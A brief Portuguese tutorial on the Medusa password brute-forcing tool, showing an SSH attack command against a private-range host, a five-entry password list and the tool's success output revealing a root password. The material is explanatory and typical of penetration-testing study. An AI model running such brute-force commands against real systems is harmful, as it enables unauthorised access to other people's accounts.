Medusa

Ferramenta utilizada para realizar “login brute-forcer”, suporta diversos serviços, abaixo um exemplo de utilização:
 # medusa -h 10.10.8.163 -u root -P passwords -M ssh

O comando acima funciona da seguinte maneira, medusa é a ferramenta, -h especifica o alto, -u é o usuário, mas também posso utilizar um arquivo com diversos usuários, -P específica o arquivo com a lista das possíveis senhas, neste caso o arquivo chama-se "passwords" e contém as seguintes possíveis senhas: 

root
admin
12345
suporte
rootroot

 -M o serviço a ser atacado, no exemplo SSH. Após algumas tentativas obtenho o seguinte resultado:

ACCOUNT FOUND: [ssh] Host: 10.10.8.163 User: root Password: rootroot [SUCCESS]

Pronto a senha foi descoberta, rootroot.

Informações sobre a ferramenta:

http://www.foofus.net/~jmk/medusa/medusa.html